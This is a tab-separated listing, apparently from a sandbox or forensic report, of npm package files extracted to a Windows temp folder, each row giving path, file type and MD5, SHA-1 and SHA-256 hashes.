C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\cross-spawn\LICENSE	ASCII text	6046FFD2C9EDCD9052BB4DD794D12F95	F8E301FF400E9737F74E9F21BEDA3285AEF077CD	AAA78451B6FECD1B9C4594C796C133C0E90CAD100372FF8BC6DE615E9EF9ADF1
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\cross-spawn\index.js	ASCII text	C34D5F0D4B86A2D1B828F2FB32F353D1	A615672EDB60FE7E09825ABA0828C836E4DD3B82	B8E01CB18BA87EE1B0E5EB2EB1CE6CBB25A2BDD229F9E08671F8A10ED7E3AD35
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\cross-spawn\lib\enoent.js	ASCII text	89585E0499CF3ABBEEB0C7A3892FF95F	B1260D1DA8CDB9402095F6E6C17EBC988D902E70	0EFF3981C2F85BFAB685C8F104BC910F782FA3547FC96A62AA32EF3F64CA6DF4
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\cross-spawn\lib\parse.js	ASCII text	D4B1240C21C6D584E62BEAB338824852	7C38291B6FA65DAD566ABCA553622681BA64A4B3	0A67601365A3AE413653C8C9D3C6BFF2202861E1EB8B5D28BF46D4812A4465EA
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\cross-spawn\lib\util\escape.js	ASCII text	330A3A2BB14EF45CC8CFF24D25ABAAA0	AF9ACD46D821F4320B95BA4D515F8C9740F9F824	A7B7544B2F8C35510674B9D1B3793D55200FC1EFA65B6099F1932A2950A776A1
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\cross-spawn\lib\util\readShebang.js	ASCII text	81781C2C9AAB560822D3E10C2859E1F4	13DBBD6FC2CD40D2B1C7417E4D946362EF6D41F6	B05BA732E167FCF9A4FD67EBB4A5C28CCA4712A36376C0B0F2E4E1D37E7F18D2
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\cross-spawn\lib\util\resolveCommand.js	ASCII text	1C667F7933C5981D96C7F7367F121EAD	09FEBAD963C1A0905C93F4A7A4E099780847A322	E525FE739ABA01CF5EEE6473DF449CDDA93DF6266EFFA8EAE0FCFB9A4E6C5DE6
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\cross-spawn\node_modules\which\package.json	JSON data	6BCB9E5778D80EA1512A98D73D4E3C9A	402837C5BA60F95B309957ADC4657B8FE4FB1F05	43010039ED5E89F7186960BE682B3CB5CDA5AB6CDFB06CBFD4F081CF0E7B4260
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\cross-spawn\package.json	JSON data	A8F3FDD9E997785A7B5C4BD987C2516E	004B63F47AA3E8ED948E0B787B6379B58A1AE10B	8E3E77387B0EFDF22234FD8D56098BB90A0B6F0A00B8A993C1916748E701C8A6
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\cssesc\bin\cssesc	a /usr/bin/env node script, Unicode text, UTF-8 text executable	28BB635BFAD96706B78123E7207BDCE8	7165F2130109FC8C492F0C8C295768A6E6435902	D46F3B9E3DE9D4A40489FE2FB144429DE2AA53EA5D7E4C856B1FA3CCAECC6E44
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\cssesc\cssesc.js	Unicode text, UTF-8 text	D4CA8943F44A56283B3E0ECFFEB1FE6E	42286BB95DF779C97CF53A9E8F664F4897C0FE96	E80B6F193BE7DAFDDC6D4C8EB4E0B0C1E3CFABE8D9E65F1AE309D45BEBD63A91
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\cssesc\man\cssesc.1	troff or preprocessor input, ASCII text	444E7EBCBDFFC56223B77DB8BC6678EA	941D4962FEAEC32CD2258E71E19E4465FFBFF2C8	25B681D56BAD04EB2EB14CFAEF901A11DA41D9AD364705BE1FA47B1F9E0E8729
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\cssesc\package.json	JSON data	ACB5BB4E8F8EE15167E66A40B3E2159F	3A37CECE4F715E91EF0AED027BAEA0039BB20087	23F134BE44F2877C298CA56C5464EBBE190DDB49C3CE9B82BE3C73A64512D014
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\debug\LICENSE	ASCII text	D85A365580888E9EE0A01FB53E8E9BF0	59E43165AEEFDFE28D5E497A0AAEF79D6D622AF0	3A61C6C96CAF5C1D9B623FB9B04C822B783DFCB78AA7E49C76A3F643E6ED7F95
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\debug\node_modules\ms\index.js	ASCII text	FDDCC2097091479666D0865C176D6615	55F9B3A7D4CFBF68B19CCD0D698AA86483DD4694	55986972F5F3C9446F876C576E1CD30FD4F04CD26527EFBB5AD834637C740E4C
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\debug\node_modules\ms\license.md	ASCII text	FD56FD5F1860961DFA92D313167C37A6	884E84EBFDDAFD93B5BB814DF076D2EBD1757BA8	6652830C2607C722B66F1B57DE15877AB8FC5DCA406CC5B335AFEB365D0F32C1
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\debug\node_modules\ms\package.json	JSON data	B3EA7267A23F72028E774742792B114A	FE112804E727B4F3489E9A52900349D0A4ED302C	3708FD273BF5B1E91C72D88143F48AD962ADCC10B99250A4A203D13804F37757
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\debug\package.json	JSON data	2630A1AC039C8970C8FB0DAF0F2F03C4	ED6FE3DCF77A4C2DDADDE904C5B1FC47CF9893C7	754BA4F352A9B983FBBF93CFFFE015D29BC789A08EB05815270ABF50902697FB
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\debug\src\browser.js	ASCII text	20BD9FAD97B79A0A28E550ADE5CD3AB3	E63A38B9E85D1D86DEA2E02C6F885FA001B49D34	4E3DC6D0E1DB58A0D74206B443F35582D3B717BE56A0F6D030C34AF6C2AD9F62
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\debug\src\common.js	ASCII text	28E94A3CC7D081498BEA5CED383038F6	C9707394C09387B56864A8865158D29FD307774A	C65BFF44C189188E0C45AFDBD9B02C427FF5C6E54B94DA53C102FBB7A53F0E37
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\debug\src\index.js	ASCII text	D6C53F5A0DD8F256D91210AD530A2F3E	0F4CE3B10EFF761F099AC75593F7E05B149AE695	AA127FF1752B7D9C7415C5C7BB6994D9AA722B81BCBCAB4BD48316B013D23BF3
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\debug\src\node.js	ASCII text	6E63FDA079262F01E14F03BDF77146C0	481608E3C95722F3A474336E5B777A6A521E76F9	F237ADCB52849DE7C128F57E0468B52353C529A6C8341810477C0E7144359559
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\defaults\LICENSE	ASCII text	CC8A04099381C61D3432E8226406CBDB	F6EB8CD4B473C79E30106A7CA26C085DDCD8F266	FE99D9A94EC7EDC64A9767701F830F66E08239B000D653A359D66E640289ED0C
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\defaults\index.js	ASCII text	63EEC2D2CB4BDA3FBC8160A1923B7B6E	E40DB818E440A87121BE59FC3169018315E2DB23	956873DA5A50B3C36F7497B3FDD89146E21527C8259DD6DE69F2657677B29E67
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\defaults\package.json	JSON data	7DAD5E38AD85C5233313740ED68D690E	06F88E0899441D1848B0230F9DAF9B4C873AF31A	182A686C374D9E559A621BD72A0C0ECAAA6A6AB51BFDD6697A78BAF158E66B9A
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\defaults\test.js	ASCII text	051AC0B7B966044348013A7D29802E1E	41537038884B550553E36F41145ABB61B9193EFC	8566C3A4E3D8D35308E37EEA9A65E168CF471E8CC30030C43FA277C855B54B8E
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\delegates\History.md	ASCII text	B79077AB75E12C8E652B4DFF7EBB453C	37E8641729544115B9D3A566EAD3480E47D44A9B	F4686952CCCF52B0CFDEE52D5F2960DC5E8097A608987B22339ACA0F18A82B89
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\delegates\License	ASCII text	039225978C07BC42E8C0EF2F72B81C09	9D414BD96CE8326FADC2F959781154DE49AF5B00	CB4E4296DFC59387F7C6EF71B670CDE7050617313FCEA7173995176FEC0FCEF2
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\delegates\Makefile	ASCII text	A15D6DBB1BE30B92AEE23E79571E93B0	ABD4A7CD4A519DF349900DD853A307F58A5CD4A5	6438415EBEA1A06C38FB94429C95BE38996B1E774F6515D9A48E5D48DF20E9C9
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\delegates\index.js	ASCII text	FE8852BBEF1A3D30B7B0FC78AA3FDE97	694697BE68FB102FB7E9F70D9F35A8827C6D6943	DB3EE6AB2FDABDFFC19D5DF0CF9461488329379CBB0640EB73203A35197960AA
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\delegates\package.json	JSON data	FA4A364036777C0CF422BEE58A0C4E2D	F192D34B412F6FDA6A541ACEE81DE9E0D48648BB	7FE6BA799E1316869F2990CFE8E51BD29A40E1E5F327BABDD38D23E3E23E8D87
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\delegates\test\index.js	ASCII text	0CFA1DFBB0F689754598336C8AF5B027	F1C8EC4CFEA947C03D8DD7C2CE43E7E878794284	36D8A2D16E8138FA52AB1FD35348B8591414EDD6EE318DC1871FCB51A932DDA4
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\diff\CONTRIBUTING.md	ASCII text	A4FC2EBF112B56934DED1682FB741C39	F3AA352BBF7CC98085FC25E4B1574A46B3936D40	E4BBD62D8510C2DE3C8A211F919AFF98C6DBB2EC42A565C43C2E4E2482B581BD
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\diff\LICENSE	ASCII text	E6F0309F3F9919CD96CC45A4D4859C54	F62E826F0D70E5202B440E337382D1C3FABB05A8	152F0FB43E953FCF5C56C5BFA4C834BB96B1603E4026319C613DD3E734F305CF
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\diff\dist\diff.js	Unicode text, UTF-8 text	2BB2B76F6520C4738694E3A3667EFC3F	2BF8A078790C32FBEDEE112F6C8E6992BC731B48	28019BE9ACD685D12CF6BCF152A75007918EAF28D4F5486DDE03E3E7E983B7F7
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\diff\dist\diff.min.js	ASCII text, with very long lines (15854)	77C5643B5796954DAF27A63AC6A6FAA6	E58C1A5560C0D3D5F4524C826E3BCB13EFECB4C0	3A29BD9374B219BD6964550085CDDF6B62FC4073893D3F251C1D61EF1EA56B7F
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\diff\lib\convert\dmp.js	ASCII text, with very long lines (1644)	F35F163180EBE36BB524C527E2BF21BD	901A488C208181B7E65015EE92A06B3F967BEE5D	5DE2B6E625C4DEEA898057E0FD8E2EA8B704BA97F6986D693775801D12268673
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\diff\lib\convert\xml.js	ASCII text, with very long lines (2564)	B61483E1DD88D513123F8581F8209DF8	DE5820F5E5A32469F561077D04D493DD3387808A	CC5467E24D48AB4BDA8C2253E6A6134F8BA155EF542F596E33D0B11E1CDDE1F1
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\diff\lib\diff\array.js	ASCII text, with very long lines (1376)	0883612B628369490FBAAC3D9C4DEE0B	B997C1817D94B0311E13F5EC4A38CC713978EC1F	9A5E26C81B1C78441F443C350761148E006995FB88A8B750BE20415208F1E91E
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\diff\lib\diff\base.js	ASCII text, with very long lines (22480)	A78B643BA4DCD7EA2666B36E47695DD2	01E377299619F7F95DFE0CEED64DB4A3BEF2ED23	9C3EACDA8C3924C702439D9E4B77036AF14D4190FFC7E32956095668C6DA167D
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\diff\lib\diff\character.js	ASCII text, with very long lines (880)	F0B3144985372874E229E6AD4B94B722	B00BFD7D9C367FF0ADF8A44B116254850EF50177	E8C614F9A59CC80AB1E95483DCC38B0C2689CC6E02C65705BB9C3092F496B998
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\diff\lib\diff\css.js	ASCII text, with very long lines (1128)	1F216019E498CA9B4F9ED93921D1ED9F	0702FD97A472D2B13AC58E72A9666C0B81290BD1	8728AA9ADE9830178CD1ED127C5DFE4949808525E21091A571812FA142F68730
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\diff\lib\diff\json.js	ASCII text, with very long lines (8576)	D1912366D93A2738EDE81F421184E895	11D7332AA70D9912BE06BFF6B00588DD84E86DEC	E9EF76B36E5A19263D199AC35871A15AA2B33C00479192B71F6C8F46B91A1661
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\diff\lib\diff\line.js	ASCII text, with very long lines (3728)	1691AEC76D6BBA5A65C7CC970380F8FA	3D8655E21B82593CB231F2880B173120CF3258CE	4A59B38AF9EE131F7BAAAD55C5EF077DF276736BCD125A0A9C1E824EF7FBBA66
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\diff\lib\diff\sentence.js	ASCII text, with very long lines (1196)	DF66601D6285B436EFD58D1FF05C94FF	8CFF35456539A08B12B262650A96210E018E481E	A9F98D614ECB77755CB2C949239598BC597E7AF29D5CDB534CAF5662FD193036
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\diff\lib\diff\word.js	Unicode text, UTF-8 text, with very long lines (5824)	066411B2F3821C32265813852458D6A7	EB7EFB705DA05D119A7BEB310103876A89281809	56F8BFC3BD504657133F8172FA63FC4EF48EC3234B2143F393211E797ECF2D66
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\diff\lib\index.es6.js	Unicode text, UTF-8 text	B0189FC844758EA7861A33D4CF3DEAA2	42B196484A16DB7A66EEB56906ED26E2182799FB	69694883A1EE6EF36C17144E2EB41E5D75B8C0F487CAE980FD536BCAB5960931
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\diff\lib\index.js	ASCII text, with very long lines (3012)	45209E07E41D77271F63ADFBCD59D917	C3F3385BDF0F411B888BB8700C5097503D4DE2D2	B2EA7D13F91893E2D8B47D86E6F9011F7F8A9721956BB4CDA31AAE20F4C69BB2
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\diff\lib\patch\apply.js	ASCII text, with very long lines (14196)	B5F939A05CD6949954FE5838ABDE3391	C72692E5936C2B3B78F7D2740B9654EBBADB3E94	E5E12DDC9F74C00841C540BC49DFF0A3BC0D36C4C7027449B10E362123EDB49B
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\diff\lib\patch\create.js	ASCII text, with very long lines (15320)	C112ABB6141851DA513B24A69881C147	AA626B2D4439C41FFD06B1AE1D725C20554017C0	CBFD20BD38B97F4B9DD44AEB8B5730BAF90A15F9281BA9CA6C23766A665BA647
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\diff\lib\patch\merge.js	ASCII text, with very long lines (34588)	5B61ED37DF8D8D18440DB735CD95ECA5	11CC5226CA662B116B2026301DCFBF9AC47F9624	E787B5D3A9BFE5993416133A6438A43AF5BB7B6DFC5D4E1862AA88D86EE08A13
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\diff\lib\patch\parse.js	ASCII text, with very long lines (13176)	38667189B33238EE8B6216CEFB6D271C	6C174DC63006189B717BCF558AC5319BE6E8357D	0A0C0401D39F10012C9A1D5597A390F891C48C6DE880F7F8F4BFF854FA63A882
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\diff\lib\util\array.js	ASCII text, with very long lines (1476)	F6788F9800BC1DD34B316D4DCCF84BDD	63F50C586DF5DBCAC695FB7CF71BB1AFE9715980	856782965C876EAB3E9C2B8325B875DEE5BB7D21D3CA4545C2B6EB5801F355ED
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\diff\lib\util\distance-iterator.js	ASCII text, with very long lines (3156)	CEDE259C351C752B8FA90BC48AF624E9	E41C1F463C03D985703C584A35080A638DAC2B8E	617C8651D583F7B95543555B4B12C987893D6FF583A98F56872E6096EBD1D880
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\diff\lib\util\params.js	ASCII text, with very long lines (1248)	BD5A264C506F8339FCA0ADE01D3D7F95	A91CE1B1AE0C9ECEF4D51F72599D010E3F49F972	2BE26E04FC40DBA9A196233B9D5523F04FB603534F4DD8C763C1E9D10E4A816F
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\gauge\LICENSE.md	exported SGML document, ASCII text	C637D431AC5FAADB34AFF5FBD6985239	0E28FD386CE58D4A8FCBF3561DDAACD630BC9181	27D998B503B18CDB16C49E93DA04069A99BA8A1D7E18D67146DE8E242F9A6D21
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\gauge\lib\index.js	ASCII text	84494738A069DEE30A8B3EF2B28EB547	C3C64CDEE39E1DE0007BBEED09E7C73151B7ACC5	26225021BA13588B0467F0FC8850CDBF48382A114D3337169AA476BD57529E3B
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\gauge\lib\plumbing.js	ASCII text	EA9B89A82C6935DD42F43F4A91CD4B3E	CED271EFE695D542670CC84C98435590956D97E8	1E7982A4080950347C5C4A33C6A4E7E6E5A6C0AE0E0FB87301E62B48FC3A75F1
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\gauge\lib\render-template.js	ASCII text	CF43109055CAFCA38DAC321184CCC156	DBDAA677B6ECCCBC84AF96C665D37104DB42B092	24B1E5D87BEE1B0334C6B7E92C9883F8C818568C88DD3F009792D76DAF5F4D65
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\gauge\lib\set-interval.js	ASCII text	CF1C3E0E4BC3B07ADF812B1C70E8BDBD	5C2C33590101B8947FDFE9A22BA1D17B1F1E4D70	19D2FA52118A39A7810EFEB7BCE45418F3E55EE7B445C85811D07A2F73B7BBB7
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\gauge\lib\wide-truncate.js	ASCII text	9AFEDFE565B7E647CD86AFE30CA30F17	E3872150672C271BD72B4BD700CCFDA9F0B8DCB3	0C313FA1C5E3AC4F064993E88CE4C074106BBD4154D90F291E4C0C42D7147004
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\gauge\package.json	JSON data	DA0CA97CC8EF387AC763D38BEC30BE5F	CF0432710533394F51727578192DD00BCD7311B5	43E5385F29AB0655BE12C84D3E48247D9E0D47CDE96BE93272003895C93108D5
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\glob\dist\commonjs\glob.js	C++ source, ASCII text	B40F4A76BB4F1B80A8E613345E75A2A4	C1F345AFFAB0826E89E28C4D74B44C393B05BC78	24896D04E4A5603433A5FEA82BAA55BA2A8DF27D13D43EEAA585BE935A2D5867
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\glob\dist\commonjs\has-magic.js	ASCII text	078FBABB35426591CB06FD1199442926	E5FB79330EC44FD6AD4BB48C96D5F591880CBBD6	1E4A9ACAFA68903D5331E17635339CA59C52B71152E82E195438ADC46EF7381A
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\glob\dist\commonjs\ignore.js	C++ source, ASCII text	0CF501C1503466C2E56829D265F32636	510F2C442C62EFB6B1CFBD60F772F4E5A0FEE48B	795C90E61B9D585D71730A6D32730B566EC5BEAA5FB7FD2BC492A88F8F1710FE
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\glob\dist\commonjs\index.js	ASCII text	E7AB0FB137DCB5CC862FBE1AB2CD7D85	342601487C426B0BFC2010CB2C5E792AEA12E805	EDAD9C6E38C0338F940A098D7532F30D5566CC5C81A587D3B82B51E5A15FB678
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\glob\dist\commonjs\package.json	JSON data	95B08BC3062CDC4B0334FA9BE037E557	A6E024BC66F013D9565542250AEF50091391801D	FA6944A20CA5E6FBAF98FD202EB8C7004D5B4AB786E36B9ED02EE31DBE196C9F
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\glob\dist\commonjs\processor.js	C++ source, ASCII text	37353D862E7C28EEC6F1BBC0FBB016E2	F22E4431C8D88A005320091DA94B51E5EB41EAAA	67101FB330007E0FA15E49A9B9D4C9CD919ED6A5EF7EBACFED181372A1648899
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\glob\dist\commonjs\walker.js	C++ source, ASCII text	B1582D4A9554012D891BF077A7931D34	8FA2212E5287AFCE057E4D06424FEC29111D9B9A	92DD4E831C7FFA00B61A871221C9240067C43AC77756B7111339BC482AB2C4C8
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\glob\dist\esm\bin.d.mts	a /usr/bin/env node script, ASCII text executable	35913B4F1575714F600C4D498076AAFA	689039B283403ED3DA5CB2427188D4165078AB90	964EDDED777BD10B441E2D101AD68E1DE592B4D6047831D691504B1C24E4EE4C
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\glob\dist\esm\bin.mjs	a /usr/bin/env node script, ASCII text executable	BD42B92E8422CAB9568D0AE130127299	BE2BB11799BEA00D7A1A28D39776FFAA44C4C2F4	281EF5566A7014F89C8C73512543417EEADE8CC67516E131CBD9B3E031CB3856
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\glob\dist\esm\glob.js	Java source, ASCII text	489875441E7385970CEC6246A867AB04	CEC4D419DA444C846418C025128DC57FB341FA8F	4294AE83BE20D6A4D1DFFEC38FF6BF0773B88D686AA595F82B1EAA04F10F0A3B
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\glob\dist\esm\has-magic.js	Java source, ASCII text	F452DA300A57F72EBA10FD3338A33106	60C05E7D2BDCBAF2D02E679BF377C25D5E7D7831	875F1DC7229D850E9ADAC1786CF1F0FEA3A718F4E91242049BE0E409C19A8E02
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\glob\dist\esm\ignore.js	Java source, ASCII text	35ADAFA51C8A45674345F37C0BE27635	1478BBDCABCD9D3BCE148BDFAE9D1A6B444622C7	3AA39586102A638391CCE6D6FBAB2F5134B45101ED2D676623C97A148DA87F3B
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\glob\dist\esm\processor.js	Java source, ASCII text	F550C310248C78331DC0C7C3800AF3CC	2A7BFCC7DB2F494F1EB6CBC9D2C8A4931606418A	89BAB0333FE9EFC322D1E8458C06068E7EEBEC6AA88151C159DD72D9CD119C1D
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\glob\package.json	JSON data	9C012A2D5833353CCC320E6C73F7CFB4	00856B2B9BA92E6FF019FDBB33284F082528AAB7	A01B65753518F55FD68499C2FAED4412C50FF861B4D0AE44BA6236F8CF25362A
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\graceful-fs\LICENSE	ASCII text	163972D49C2F7A3D3B687AEB48E9E3C9	13E4A8932F9E1C52C3FEB92C88CC523701E15D41	F65C5D9F22A317B2A10803BD1868461CE6499C2ED7217BC80C0CC772A748789C
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\graceful-fs\clone.js	ASCII text	F8B8F88D8550294C47EE5CC6E8EC141C	C912F366FE0025EA74E0E76E58277147DC0A3167	7258ECA52E65D69845759503F9FDD66C252F40E5EAFB76DB5D481172E31AC9ED
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\graceful-fs\graceful-fs.js	ASCII text	63D49916C84E2BBDA13D6563D9DC18B5	55EFC5A24C26495D0341C7884F0DE5EB36520EFA	7DA35669B6B6B0E4AAFEE31674C033F2CEBB0C8F9AE010F709DCC185D3F17786
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\graceful-fs\legacy-streams.js	ASCII text	620FC152DC9BFA087F9901703B1E2616	F4A3583D4C3E8B0C407AB8406BDAFB02B4055B7F	60A6A7ECF7C3E55A3FFAAE13433B6CFF388B7205BBA6DAF393C863F77A949E36
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\graceful-fs\package.json	JSON data	BABC4604A4E9958A063E1941F873D11F	21A733B3F7E2EE153041DE90FB03D5596934F346	5747D4BA6B17165C6ECAC30AB3A331715F41C7AD546E1F1574DAB1BDCB116181
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\graceful-fs\polyfills.js	ASCII text	14CBBF8E8D0632089994286844259752	38F3028EA7D9EC6B57F56EF32128499522C87A7F	66EA1687ED5EDF39D67296D26EDCCC8DA695D9A869303A78D0E580CD770ACA27
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\has-unicode\LICENSE	ASCII text	2BAB5B1C26E9C44FC4E489BB98CFB196	0478D8708F5FF5E49C150412201CB066A9B2006D	7C9C21C620F09FA0897060A50AE3B02DA7677338C72CBE399DBE417D74899974
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\has-unicode\index.js	ASCII text	C6CE2D7686D2808902ABF12837367527	38B6C5BCC04ADE8672F9227840E6B9F57BE816C7	F7055F40138C028925CA76B74EA5A4041B4D67D2FA4DAE2F78C2EC326EBC2BF3
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\has-unicode\package.json	JSON data	F14043C8A5D6DF10D3671D83073D6883	F25B286B591E5AA36E855957980E27569961D706	F106BBFF8F1AED94EF54031D8A4E5EBD0275B3FEFC15361A96150D9029A9D510
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\has\LICENSE-MIT	ASCII text	D000AFC3C9FF3501A5610197DB76A246	7C2355FEC210EDC01AA53D54E29B4A2DD9DE51AB	4FE5FD7B3318DEF0B74F8BF8C9276403F01DA628FA8888822661519D80F237D3
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\has\package.json	JSON data	2FEE243336BA5AEEBED1E0145472CD49	0B2FCBE54BBE41CDD6F10A52E137143B5DBC9EDF	15A15D9A842B353DAAFA9F4315D3D9E0D09B02B92E68CD39C8553BE50F16F469
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\has\src\index.js	ASCII text	A8D64BBA485FCF821ADE7CE6E94F9C0A	C8707FC359371B352F776588E694682E81AE2654	D4FA3FFE19A4722028A3D34982B75EAE4D6D2C45D737E7967FFBA9CE13515C4C
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\has\test\index.js	ASCII text	91CF2AC2CDF73A0D46F9BE0607E6AF94	8A5CD3CE486422C713E3DAF52BADE3FAFE01885F	E1DD5FE5AA345C51241F8B04D9751BEF53A9910D00E099E186AF9CB804C7DE5A
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\hosted-git-info\LICENSE	ASCII text	A01F10CD299D5727263720D47CC2C908	F87FE9863DC6D7D54117B1670CE07A85715DC465	C1476EC53119CD4C8370F91F5152AC76312A29B4FAE2D49B5E0E0970FE0FA5EE
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\hosted-git-info\lib\from-url.js	ASCII text	C0327DA0C2E3B8820E9D27E4A56B9D48	2EB7CF21436EB8BB39C7343B0EF062887B0A08A3	BE08A3F35F54A3A9510B0C2ED3E6DB03E1427965D5B189EB00BD09659938F52A
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\hosted-git-info\lib\hosts.js	ASCII text	0FB2CC7BE297F40C3660A850068FD624	26F548E1C78E0BD703F000760470093581404351	34B1185124A00FEFC3D13B9DC11D6164B32F1467502E12F62D539FB4C9370AE1
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\hosted-git-info\lib\index.js	C++ source, ASCII text	B54DFD3BC37231551AB0E2D2E6C84D99	4E88B53A69EDF44AD9493762872E94B88DCDD537	356091C388C6390D7AA449A1F9B5A199416EE9147C087AADB1E96BE406E6740E
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\hosted-git-info\lib\parse-url.js	ASCII text	53E94E5253759833E5655BDBFBE92B7E	7207CD1448A1A9DAF98DF5F8790CBD9A8B60BFF6	9444D54E19CDAF56D4B257CA38A0850466BC3572677340FB132C48F2D3890B7C
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\hosted-git-info\package.json	JSON data	200361284C50587A7E91ECEAF1D02ABB	CB47D34649F6BC291751B67CEEC4DD41725CFC66	820F07FAAEDAEE8C7E8C72759684D37828320639F92A0404761B2A60BE326371
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\http-cache-semantics\LICENSE	Unicode text, UTF-8 text, with very long lines (755)	7B7CD412797B9E24E3C58EFF96661BF9	33382AAE7725488A616426986298F9D1CD2E566C	AB868AD5A2EF5068560D9CD3B2180EC63C140BB4C5CAE1BA779D300A0AC74FA3
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\http-cache-semantics\index.js	ASCII text	79E153C9903D3B38F57A60C49995DD64	17CC151AD1CFD0BE75B32F171AD63F1ECF5E9EF2	E5DA23845E88C1F06B8AE520AA99601AB57C0C1D9B0ECED70031F41938156D2D
